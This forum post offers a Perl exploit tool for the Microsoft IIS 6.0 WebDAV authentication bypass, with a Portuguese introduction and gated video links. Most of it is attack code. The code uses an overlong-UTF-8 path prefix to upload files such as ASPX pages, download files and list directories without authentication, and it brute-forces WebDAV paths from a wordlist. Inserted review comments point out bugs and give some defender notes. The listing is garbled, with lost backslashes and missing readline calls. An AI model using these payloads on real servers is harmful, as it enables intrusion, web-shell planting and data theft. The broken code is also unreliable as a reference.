    WebDAV Auth Bypass Exploit

    Ver Video Aula:
    Apenas usuários registrados e ativados podem ver os links. Clique aqui para se cadastrar...

    download Video Aula:
    Apenas usuários registrados e ativados podem ver os links. Clique aqui para se cadastrar...

    Tool in perl:
    Código:
    #!/usr/bin/perl
    #  ********* !!! WARNING !!! *********
    #  *   FOR SECURITY TESTiNG ONLY!    *
    #  ***********************************
    #  MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1
    #  v1.1 add brute force dir fuction.
    #  v1.0 download?upload and list dir.
    #
    #  Usage:
    #		IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file]
    #		-target								eg.: 192.168.1.1
    #   -port									eg.: 80
    #   -method								eg.: g
    #    (p:PUT,g:GET,l:LIST)
    #   -webdavpath						eg.: webdav
    #   -BruteForcePath				eg.: brute force webdav path
    #   -file	(optional)			eg.: test.aspx
    #  Example:
    #		put a file:
    #				IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx
    #		get a file:
    #				IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx
    #		list dir:
    #				IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav
    #		brute force + list dir:
    #				IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt
    #		brute force + get file:
    #				IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx
    
    use IO::Socket;
    use Getopt::Long; 
    
    use threads;
    use threads::shared;
    
    # Globals Go Here.
    # NOTE(review): the script does not enable `use strict`/`use warnings`;
    # only the variables below are declared with `my`. $error, $filesize,
    # @results, $flag, $line, $result and $no further down are implicit
    # package globals.
    my $target;				# Host being probed.
    my $port;					# Webserver port.
    my $method;				# HTTP Method, PUT GET or .
    my $xpath;				# WebDAV path on Webserver.
    my $bpath;				# Bruteforce WebDAV path.
    my $file;					# file name.
    my $httpmethod;
    my $Host_Header;	# The Host header has to be changed
    
    # Command-line parsing. NOTE(review): the real option names are
    # target/port/method/xpath/bpath/file, not the -webdavpath and
    # -BruteForcePath shown in the usage text; the -t/-p/-m/-x/-b/-f forms
    # in the examples work only through Getopt::Long's unique-prefix
    # matching. As printed the destinations are plain scalars rather than
    # references, which is consistent with the backslash loss seen
    # throughout this listing.
    GetOptions(
            "target=s"      => $target,
            "port=i"        => $port,
            "method=s"      => $method,
            "xpath=s"       => $xpath,
            "bpath=s"       => $bpath,
            "file=s"        => $file,
            "help|?"        => sub {
                                    hello();
                                    exit(0);
                               }
    ); 
    
    # Argument validation; messages are accumulated and printed together.
    # NOTE(review): throughout this listing the escape sequences appear to
    # have lost their backslashes ("hostn", "rn", "t" where "\n", "\r\n",
    # "\t" are clearly meant), so the strings are shown as extracted, not
    # as they would execute.
    $error .= "Error: You must specify a target hostn" if ((!$target));
    $error .= "Error: You must specify a target portn" if ((!$port));
    $error .= "Error: You must specify a put,get or list methodn" if ((!$method));
    $error .= "Error: You must specify a webdav pathn" if ((!$xpath) && (!$bpath));
    # NOTE(review): `!=` is a numeric comparison; both $method and "l"
    # numify to 0, so this condition is always false and the -file
    # requirement is never enforced (`ne` was evidently intended).
    $error .= "Error: You must specify a upload or download file namen" if ((!$file) && $method != "l"); 
    
    if ($error) {
            print "Try $0 -help or -?' for more information.n$errorn" ;
            exit;
    } 
    
    # Print the banner, then map the one-letter -method value onto the HTTP
    # verb actually sent: p -> PUT, g -> GET, l -> PROPFIND. Any other value
    # prints a message and exit(0)s — as do the checks in webdavtest() and
    # webdavbf() — so a shell caller cannot tell these failures from success
    # by exit code; only the die() calls exit non-zero.
    hello();
    
    if ($method eq "p") {
    	$httpmethod = "PUT";
    } elsif ($method eq "g") {
      $httpmethod = "GET";
    } elsif ($method eq "l") {
      $httpmethod = "PROPFIND";
    } else {
      print "$method Method not accept !!!n";
      exit(0);
    }
    
    # ************************************
    # * We testing WebDAV methods first  *
    # ************************************
    # webdavtest() sends "OPTIONS /" and exits unless the Server header says
    # Microsoft-IIS, a DAV header is present and the Public header lists
    # $httpmethod (it reads $httpmethod and $target as globals).
    webdavtest($target,$port);
    #end of WebDAV testing.
    # ****************************************
    # * We try to brute forceing WebDAV path *
    # ****************************************
    # With -bpath the wordlist result replaces any -xpath value; webdavbf()
    # exits the process itself when nothing matches, so this assignment
    # only happens on success.
    if ($bpath) {
      $xpath = webdavbf($target,$port,$bpath);
    }
    #end of brute force
    print "-" x 60 ."n";
    if ($httpmethod eq "PUT") {
      my $content;
      my $data;
      #cacl file size
      # NOTE(review): $filesize is an undeclared package global (also read by
      # the PUT request below); -s returns undef for a missing file.
      $filesize = -s $file;
      print "$file size is $filesize bytesn";
      # NOTE(review): two-argument open with a bareword handle on a
      # caller-supplied name; leading/trailing mode characters in $file
      # (">", "|", " ") would be interpreted by open rather than treated as
      # part of the filename. Three-argument open('<', $file) avoids this.
      open(INFO, $file) || die("Could not open file!");
      #@lines=;
      binmode(INFO); #binary
      # Slurps the whole file into $content in $filesize-byte reads.
      while(read(INFO, $data, $filesize))
      {
      	$content .= $data;
      }
      close(INFO);
      #print $content;
    
      # Content-Length is taken from the on-disk size, not from
      # length($content), so the two would disagree if the file changed
      # between -s and read().
      $Host_Header = "Translate: frnHost: $targetrnContent-Length: $filesizern";
    } elsif ($httpmethod eq "GET") {
      # GET adds a "Translate: f" header and asks the server to close the
      # connection after the response.
    	$Host_Header = "Translate: frnHost: $targetrnConnection: closernrn";
    } elsif ($httpmethod eq "PROPFIND") {
      # NOTE(review): as printed the inner quotes around utf-8 are not
      # escaped inside a double-quoted string, so this line would not parse;
      # consistent with the backslash loss seen elsewhere in the listing.
    	$Host_Header = "Host: $targetrnConnection: closernContent-Type: text/xml; charset="utf-8"rnContent-Length: 0rnrn";
      # NOTE(review): appends an empty string — a no-op as printed; any
      # angle-bracketed text here may have been stripped by the forum's
      # rendering. Content-Length: 0 above means no body is expected anyway.
    	$Host_Header = $Host_Header."";
    }
    print "-" x 60 ."n$httpmethod $file , Please wait ...n"."-" x 60 ."n";
    
    # ************************
    # * Sending HTTP request *
    # ************************
    # Each branch prefixes the request path with "%c0%af" (an overlong UTF-8
    # encoding of "/") before the WebDAV path. From the defender's side that
    # fixed prefix is something a legitimate WebDAV client never sends, so it
    # is what request logging, a WAF or an IDS rule should key on; applying
    # the vendor fix for this IIS 6.0 issue (or running a later IIS) removes
    # the underlying bypass.
    # sendraw2() returns the response as a list of lines, or a single scalar
    # ("Timeout" / "0") on failure, which is why `$#results < 1` is used as
    # the failure test in all three branches.
    if ($httpmethod eq "PUT") {
      @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0rn$Host_Headerrn$content",$target,$port,10);
      if ($#results < 1){die "10s timeout to $target on port $portn";}
    } elsif ($httpmethod eq "GET") {
    	@results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0rn$Host_Header",$target,$port,10);
      if ($#results < 1){die "10s timeout to $target on port $portn";}
    } elsif ($httpmethod eq "PROPFIND") {
    	@results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0rn$Host_Header",$target,$port,10);
      if ($#results < 1){die "10s timeout to $target on port $portn";}
    }
    #print @results;
    # Success is any 2xx status line; 4xx is an explicit failure; other
    # classes (3xx, 5xx) simply leave $flag at its initial "off".
    $flag="off";
    if ($results[0] =~ m|^HTTP/1.[01] 2[0-9][0-9] |){
    	$flag="on";
    } elsif ($results[0] =~ m|^HTTP/1.[01] 4[0-9][0-9] |){
    	$flag="off";
    }	
    
    print "-" x 60 ."n";
    if ($flag eq "on") {
      if ($httpmethod eq "PUT") {
    	  print "$httpmethod $file from [$target:$port/$xpath] OKrn";
      } elsif ($httpmethod eq "GET") {
        # Locate the end of the response headers by looking for the
        # Accept-Ranges line; everything after it is treated as the body.
        # NOTE(review): this depends on Accept-Ranges being the last header
        # the server emits; a different header order misplaces the split.
        my $line_no = 0;
        my $counter = @results;
        foreach $line (@results){
      	  ++$line_no;
    	    if ($line =~ /^Accept-Ranges: bytesrn/){
    	  	  last;
    	    }
        }
    
        # Write file to disk
        # NOTE(review): two-argument open building the mode from a
        # caller-supplied name; $file doubles as the local output name, so
        # the fetched content lands in the working directory under the
        # -file argument.
        open(OUTFILE, ">$file") or die "Could not write to file: $!n";
        binmode (OUTFILE);
        # NOTE(review): $counter is the element count, so the slice's last
        # index is one past the end of @results (an undef element).
        print OUTFILE @results[$line_no+1..$counter];
        close(OUTFILE);	 
    
    	  print "$httpmethod $file from [$target:$port/$xpath] OKrnPlease check $file on local diskrn";	  
    
      } elsif ($httpmethod eq "PROPFIND") {
        print "$httpmethod path list from [$target:$port/$xpath] OKrn";
        # NOTE(review): in `/^<?xml version=/i` the unescaped `?` makes the
        # `<` optional, and `split("", $line)` splits into single characters
        # (an angle-bracketed separator has likely been stripped by the
        # forum), so as printed this loop does not produce a usable listing.
        # $result and $no are undeclared globals.
      	foreach $line (@results){
    	    if ($line =~ /^<?xml version=/i){
      		  my @list = split("", $line);
      		  foreach $path (@list) {
      		  	$no = index($path,"<");
      		  	$result.=substr($path, 0, $no)."n";
      		  }
      		  print $result;
    	  	  last;
    	    }
        }
      }
    } else {
    	print "$httpmethod $file from [$target:$port/$xpath] FAILED!!!rn";
    }
    print "-" x 60 ."n";
    exit(0);
    
    # *************
    # * Sendraw-2 *
    # *************
    # sendraw2($request, $ip, $port, $timeout): open a TCP connection, write
    # the raw request string and return the response as a list of lines.
    # Returns the single scalar "Timeout" if the alarm flag is seen and "0"
    # if connect() fails; callers test `$#results < 1` for both cases.
    sub sendraw2 {
      my ($pstr,$realip,$realport,$timeout)=@_;
      my $target2 = inet_aton($realip);
      # NOTE(review): this lexical is never set by ermm(), which assigns the
      # package global $flagexit, so the `== 1` test in the loop below can
      # only ever see 0.
      my $flagexit=0;
      # NOTE(review): as printed, `&ermm` *calls* ermm() right here (with
      # the current @_) and stores its return value in $SIG{ALRM}; the
      # handler slot expects a code reference. Consistent with the backslash
      # loss elsewhere in the listing.
      $SIG{ALRM}=&ermm;
      # Bareword handle S plus a hand-packed sockaddr_in below ("SnA4x8":
      # family 2 = AF_INET, 16-bit network-order port, 4-byte address, 8 pad
      # bytes). IO::Socket is used only for Socket's inet_aton and
      # constants; its object interface would replace socket/connect/pack.
      socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");
      alarm($timeout);
      if (connect(S,pack "SnA4x8",2,$realport,$target2)){
        alarm(0);
        my @in;
        # Make the socket the default output handle (unbuffered) and send
        # the request. The default handle is restored to STDOUT only on the
        # normal return path below, not on the Timeout path.
        select(S); $|=1;
        print $pstr;
        alarm($timeout);
        # NOTE(review): as printed this loop has no condition and never
        # reads from S, so $_ is pushed unset; the readline evidently did
        # not survive extraction and the listing is not runnable as shown.
        while(){
          if ($flagexit == 1){
            close (S);
            print STDOUT "Timeoutn";
            return "Timeout";
          }
          push @in, $_;
        }
        alarm(0);
        select(STDOUT);
        close(S);
        return @in;
      } else {return "0";}
    }
    
    # ALRM handler intended for sendraw2(): mark the timeout and close the
    # socket. NOTE(review): $flagexit here is the package global (no `my`,
    # no `use strict`), not the lexical declared inside sendraw2(), so the
    # flag it raises is never the one that loop checks.
    sub ermm{
            $flagexit=1;
            close (S);
    }
    
    # webdavtest($ip, $port): send "OPTIONS /" and require a Server header
    # containing Microsoft-IIS, a DAV header, and a Public header that lists
    # the chosen $httpmethod. Each failed check prints and exit(0)s. Reads
    # the globals $httpmethod and $target; writes the globals @results,
    # $flag, $line, $left and $right.
    # NOTE(review): the messages and the die below use $target rather than
    # the $testip parameter, so the sub is not reusable for a host other
    # than the one on the command line.
    sub webdavtest {
    	my ($testip,$testport)=@_;
      print "-" x 60 ."n";
      print "Testing WebDAV methods [$testip $testport]n";
      print "-" x 60 ."n";
      @results=sendraw2("OPTIONS / HTTP/1.0rnrn",$testip,$testport,10);
      if ($#results < 1){die "10s timeout to $target on port $testportn";}
      #print @results;
      $flag="off";
      foreach $line (@results){
    	  if ($line =~ /^Server: /){
    		  # Split at ":" and drop spaces; the value presumably keeps its
    		  # line terminator (nothing chomps it), which is why the print
    		  # below adds none.
    		  ($left,$right)=split(/:/,$line);
    		  $right =~ s/ //g;
    		  print "$target : Server type is : $right";
    
    	    if ($right !~ /Microsoft-IIS/i){
    		    print "$target : Not a Microsoft IIS Servern";
    		    exit(0);
    	    }
    	  }
    
    	  if ($line =~ /^DAV: /){
    		  $flag="on";
    	  }
    
    	  # NOTE(review): the Public check runs only once $flag is "on", i.e.
    	  # only if the DAV header arrived before Public in the response. If
    	  # the server orders them the other way, the method check is silently
    	  # skipped and the request is sent anyway. The `$flag="on"` in the
    	  # else branch is redundant (it is already "on" here).
    	  if ($line =~ /^Public: / && $flag eq "on"){
    	    ($left,$right)=split(/:/,$line);
    	    $right =~ s/ //g;
    	    print "$target : Method type is : $right";
    	    if ($right !~ /$httpmethod/i){
    	      print "$target : Not allow $httpmethod on this WebDAV Servern";
    	      exit(0);
    	    } else {
    	      $flag="on";
    	    }
    	  }
      }
      if ($flag eq "off") {
        print "$target : WebDAV disablen";
        exit(0);
      }
    }
    
    # webdavbf($ip, $port, $wordlist): try each line of the wordlist as a
    # WebDAV directory with a plain PROPFIND and return the first candidate
    # whose status line is 401. If the list is exhausted the process
    # exit(0)s, so the caller only ever sees a return value on success.
    # From the defender's side the footprint is one PROPFIND per wordlist
    # entry against the same host in quick succession — a burst of PROPFIND
    # requests answered 401/404 in the access log.
    # NOTE(review): as printed `foreach $lines ()` iterates an empty list
    # (the readline from BF likely did not survive extraction), and BF is a
    # bareword handle opened with two-argument open on a caller-supplied
    # path. $lines, $Host_Header and @results are globals.
    sub webdavbf {
    	my ($bfip,$bfport,$bfpath)=@_;
      print "-" x 60 ."n";
      print "Try to brute forceing WebDAV path ...n";
      print "-" x 60 ."n";
      open(BF, $bfpath) || die("Could not open file!");
      foreach $lines (){
      	chomp($lines);
    
    	  # Rebuilds the global $Host_Header every iteration (same unescaped
    	  # inner quotes around utf-8 as the PROPFIND branch in the main flow,
    	  # and the same no-op append of "").
    	  $Host_Header = "Host: $bfiprnConnection: closernContent-Type: text/xml; charset="utf-8"rnContent-Length: 0rnrn";
    	  $Host_Header = $Host_Header."";
    
    	  @results=sendraw2("PROPFIND /$lines/ HTTP/1.0rn$Host_Header",$bfip,$bfport,10);
        if ($#results < 1){die "10s timeout to $bfip on port $bfportn";}
    
        print "[$lines]...$results[0]";
    
       	#maybe this response
       	#HTTP/1.1 207 Multi-Status
        # NOTE(review): only a 401 status counts as a hit; the 207 named in
        # the comment above is not matched, and the `last` after `return`
        # is unreachable.
        if ($results[0] =~ m|^HTTP/1.[01] 401 |){
        	print "Find out path on [$lines]n";
    	    return $lines;
    	    last;
        }
      }
      close(BF) ;
      print "Sorry... We can not find any more path... :( n";
      exit(0);
    }
    
    # hello(): print the banner and usage text (also used for -help / -?).
    # NOTE(review): the banner says V1.0 while the file header says v1.1,
    # and the usage lines name -webdavpath/-bruteForcePath although the
    # options actually parsed are -xpath/-bpath. The stray "t"/"n" are the
    # tab/newline escapes with their backslashes lost in extraction.
    sub hello{
      print "n";
      print "t ##################################################n";
      print "t #    MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.0  #n";
      print "t #  **************** !!! WARNING !!! **************#n";
      print "t #  **** FOR PRIVATE AND EDUCATIONAL USE ONLY! ****#n";
      print "t #  ***********************************************#n";
      print "t #  Written by csgcsg 090529                       #n";
      print "t ###################################################n";
      print "nt $0 -target -port -method -webdavpath [-file]n";
      print "nt -targettt eg.: 192.168.1.1n";
      print "t -portttt eg.: 80n";
      print "t -method (p:PUT, g:GET, l:LIST)t eg.: gn";
      print "t -webdavpath|-bruteForcePathtt eg.: webdavn";
      print "t -filettt eg.: test.aspxnn";
      print "tUsage eg.: nt$0 -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspxn";
    };
    divirtam-se =)